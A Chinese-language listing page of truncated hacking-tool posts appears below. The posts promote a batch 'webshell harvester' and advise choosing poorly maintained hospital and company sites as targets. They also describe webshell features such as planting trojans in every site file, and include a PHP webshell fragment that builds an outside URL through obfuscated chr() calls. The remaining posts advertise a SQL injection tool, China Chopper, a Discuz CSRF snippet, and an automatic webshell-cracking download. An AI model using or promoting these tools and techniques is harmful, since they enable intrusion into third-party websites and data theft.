扫描后缀.txt，存放shell扫描用的后缀，自己可以添加更多后缀。 webshell.txt，存放扫描到的Webshell。 uploaddata/asp.txt，存放asp上传文件。 uploaddata/aspx.txt，存放aspx上传文件。 uploaddata/php.txt，存放php上传文件。 [阅读全文]

今天分享一个自己当初入门的时候的一个小工具-webshell收割机，简单实现批量getshell。算是比较老的工具了，适合新手练手用。 1：软件右上角填写关键词用于采集网址 建议写一些企业类的医院类的等具体写什么自己发挥。因为医院、企业、等这些站一般情况下没有专人维护，可能后门存在的比较久。写完之后点击开始采集就可以了，采集线程默认50,根据自己电脑硬件，可以写大一点。 等待采集到 [阅读全文]

　　本软件无毒无后门，明码未加密，代码一目了然！ 　　本代码用于测试学习，请勿用于非法攻击！ 　　下载后可以自己使用抓包软件测试！ 　　批量挂马:输入自己的代码,就可以挂入站里所有文件 　　环境变量:测试服务器环境与服务器支持设置 　　在线代理:可以直接在WEBSHELL上代理连接其它网址 　　注册表操作:可直接操作注册表与查看3389端口 　　WEBSH [阅读全文]

　　 　　$password=‘phpinfo‘;//登录密码 　　//----------功能程序------------------// 　　$c="chr"; 　　session_start(); 　　if (empty($_SESSION[‘PhpCode‘])) { 　　$url=$c(104).$c(116).$c(116).$c(112).$c(5 [阅读全文]

轻量级网站漏洞批量扫描神器（网站漏洞检测工具）是一款绿色免费的网站漏洞扫描检测工具。软件功能强大，通过网络爬虫测试你的网站安全，检测流行的攻击，如交叉站点脚本，sql注入等，可以用于小型网站破解等，帮助我们有效快速的找到各种漏洞增加网站的安全性，提前免疫各种的网络攻击。 轻量级网站漏洞批量扫描神器使用方法 1.在软件最左边空白处右键选择“导入站点”（事先 [阅读全文]

功能:  K8飞刀 20141130 [+]EncodeDecode       选中URL可右键使用 Firefox\Chrome\IE 浏览器打开    20141128 [+]DataOutput   &nb [阅读全文]

软件简介：     超级SQL注入工具（SSQLInjection）是一款基于HTTP协议自组包的SQL注入工具，支持出现在HTTP协议任意位置的SQL注入，支持各种类型的SQL注入，支持HTTPS模式注入。    超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入，支持 [阅读全文]

中国菜刀用途十分广泛，是一款专业的网站管理软件，支持多种语言，小巧实用，用途广泛，使用方便，据说是一位中国军人退伍之后的作品。 工具截图： [阅读全文]

简介:  最近在研究各类XSS,自然少不了要构造各种CSRF. 构造这玩意其实很简单 本地搭个环境 管理员登陆后对指定操作进行抓包,然后JS或FLASH来XXOO 本帖下方附上 Discuz X1.5  添加用户的CSRF的jQuery代码 供大家参考研究 转换功能很简单,但非常实用,XSS流行的年代,这功能也将成为常用  不仅这样 [阅读全文]

软件下载地址：http://www.jugubaofen.com/51la.html ★★★★  全自动无限采集网址，全自动破解webshell，批量getshell，webshell箱子，多项功能整合一体，一键自动出shell  ★★★★ [阅读全文]